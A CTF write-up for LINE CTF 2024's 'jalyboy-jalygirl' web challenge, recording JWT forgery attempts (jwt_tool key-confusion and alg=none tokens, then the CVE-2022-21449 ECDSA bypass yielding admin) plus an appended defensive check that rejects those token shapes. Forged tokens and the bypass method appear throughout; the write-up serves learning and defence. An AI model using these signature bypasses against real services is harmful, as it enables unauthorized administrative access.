[LINE CTF 2024] jalyboy-jalygirl

WEB HACKING

by koharin 2024. 4. 10. 13:56


trial #1 generating a JWT with jwt_tool (failed)

python3 jwt_tool.py eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.wFkVBMFFYKFY2eC2PBPC9fN1nyypfMIudI6lmrgQJBNQKFxw-SZHbhVlz7i1R_ufsUujq85bZUU7G_GL2VnoLQ -X k -pk /Users/koharin/.jwt_tool/jwttool_custom_public_EC.pem 

[jwt_tool ASCII banner] Version 2.2.6 @ticarpi

Original JWT: 

File loaded: /Users/koharin/.jwt_tool/jwttool_custom_public_EC.pem
jwttool_174d67fd7ae4a50c2e15d629a872fb6f - EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.Vx_ateaSdzCE5s4HNrJU4pW1UKsHoj6ugmnkhRbvd7w
python3 jwt_tool/jwt_tool.py eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.JHLYb9VnzZGvewxi1S5OyJi6pEw161wcUVJqHquIS2xOvCIgrAO85v9jpGscLXcNh54a5P4XZiulOBIPSAhaQA -T -S es256


Original JWT: 


====================================================================
This option allows you to tamper with the header, contents and 
signature of the JWT.
====================================================================

Token header values:
[1] alg = "ES256"
[2] *ADD A VALUE*
[3] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0

Token payload values:
[1] sub = "guest"
[2] *ADD A VALUE*
[3] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of sub is: guest
Please enter new value and hit ENTER
> admin
[1] sub = "admin"
[2] *ADD A VALUE*
[3] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_f28d1067c75a67087eb82593ebeaeacd - Tampered token - EC Signing:
[+] eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.k67d4GGzcmQyb_bLXjeLpnTyQ_K1j5-b0y3KzjWtk2etRnvDvZZhTHCqtojUTZDGulr7cl3XmCO_BNJT4UDfKQ
jwttool_e4966bb08199b70d934f637e95dd03e7 - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_47de7d0e3c6a526cc79028ac02644778 - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_f2bdddbc37c4a885a9ead149be5db4f6 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_1b0f6745c5519a32f768a554c0b8d1e3 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIn0.eyJzdWIiOiJndWVzdCJ9.

I tested the JWTs produced by jwt_tool's exploit modes, including the several alg=none variants, and none of them worked.

trial #2 reusing a solution from a previous CTF for the elliptic-curve algorithm case (failed)

https://ctftime.org/writeup/26445

The exploit code above is a solution(?) that works from the provided JWT and generates a JWT key by inference, so I adapted it to the challenge scenario and tried it, but it did not work either.

trial #3 CVE-2022-21449

Wondering whether this challenge could be solved with a 1-day for JWT under the ES256 algorithm, I googled and

https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/

got as far as this link during the competition. But I did not look for a PoC...

https://gist.github.com/righettod/1d2f4498e3dba4fc779036ce83565d68 

In the link above there is a header.body.signature key; you use the header and signature as they are and only supply the body with sub: admin.

Authenticated with the PoC and obtained the flag.
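The defender's side of the two token shapes tried in this write-up, as an added example that is not from the post or the challenge: a pre-verification check that rejects the alg=none variants from trial #1 and the out-of-range r, s signature shape behind CVE-2022-21449 from trial #3. The guest token and alg=none token are the ones shown above; the zero-signature token is constructed in the block, and the check is a filter in front of real ECDSA verification, not a replacement for it.

```python
import base64
import json

# Order n of the NIST P-256 curve that ES256 signs over.
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

def b64url_decode(part: str) -> bytes:
    """Decode one base64url JWT segment, restoring the stripped padding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def check_es256_token(token: str) -> tuple:
    """Pre-verification sanity check for a JWT that must carry ES256.

    Rejects any alg other than the exact string "ES256" (so the none/None/
    NONE variants jwt_tool produced above fail) and any raw r||s signature
    with r or s outside [1, n-1], the shape CVE-2022-21449 wrongly accepted.
    Returns (ok, reason); it does not replace ECDSA verification itself.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return False, "expected header.payload.signature"
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:
        return False, "header is not valid base64url JSON"
    if header.get("alg") != "ES256":
        return False, "unexpected alg %r" % header.get("alg")
    sig = b64url_decode(parts[2])
    if len(sig) != 64:
        return False, "ES256 signature must be 64 bytes, got %d" % len(sig)
    r = int.from_bytes(sig[:32], "big")
    s = int.from_bytes(sig[32:], "big")
    if not (1 <= r < P256_ORDER and 1 <= s < P256_ORDER):
        return False, "r or s outside [1, n-1]"
    return True, "ok"

# The guest token and the alg=none token are the ones shown in the write-up.
GUEST_TOKEN = ("eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.wFkVBMFFYKFY2eC2PBPC9"
               "fN1nyypfMIudI6lmrgQJBNQKFxw-SZHbhVlz7i1R_ufsUujq85bZUU7G_GL2VnoLQ")
NONE_TOKEN = "eyJhbGciOiJub25lIn0.eyJzdWIiOiJndWVzdCJ9."
# Constructed here, not taken from the write-up: ES256 header, sub=admin
# payload, and a 64-byte all-zero signature (r = s = 0).
ZERO_SIG_TOKEN = ".".join([b64url_encode(b'{"alg":"ES256"}'),
                           b64url_encode(b'{"sub":"admin"}'),
                           b64url_encode(bytes(64))])
```

Calling check_es256_token on the three tokens returns (True, "ok") only for the guest token; a patched Java runtime performs the same range check inside ECDSA verification.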
